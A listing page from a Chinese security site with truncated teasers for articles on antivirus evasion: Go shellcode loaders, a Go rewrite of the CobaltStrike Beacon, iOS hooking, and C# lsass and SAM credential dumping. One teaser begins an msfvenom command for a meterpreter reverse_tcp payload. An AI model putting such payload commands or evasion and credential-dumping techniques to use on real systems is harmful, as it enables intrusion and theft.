uintptr - 第 2 | CN-SEC 中文网

安全文章

免杀实战 | Go shellcode加载 bypass AV

由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！ go shellcode加载 bypass AV 在攻防实战中免杀技术尤为重要，站在巨人的肩膀上学习go shellcode免杀加载的方法 ...

05月17日114 views评论

安全文章

go shellcode加载 bypass AV在攻防实战中免杀技术尤为重要，站在巨人的肩膀上学习go shellcode免杀加载的方法相关代码打包至github https://github.com...

05月16日85 views评论

程序逆向

免杀专题文章及工具：https://github.com/TideSec/BypassAntiVirus免杀专题在线文库：http://wiki.tidesec.com/docs/bypassav本文...

03月08日33 views评论

安全文章

跨平台重构CobaltStrike的Beacon并行为对主流杀软免杀背景上个月的时候朋友发给了我 geacon 这个项目，该项目使用Golang实现了Beacon的部分功能，我俩觉...

01月10日57 views评论

安全文章

本文为看雪论坛优秀文章看雪论坛作者ID：LeoW丨hook objc_msgSendobjc_msgSend是iOS里最重要的方法。按道理来说，hook objc_msgSend就可以获取到app中所...

01月07日19 views评论

声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。文章作者拥有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整...

05月17日安全博客45 views评论

安全文章

一简单实现（1）msf生成shellcode，选择输出hex格式。msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168...

04月11日152 views评论

安全文章

前言选择 C# 的好处是体积小，结合 loadAssembly 方便免杀。造个轮子，希望各位看客有所帮助。检测权限因为dump系统lsass内存和sam注册表需要管理员权限，所以首先需要对当前进程上下...

03月07日108 views评论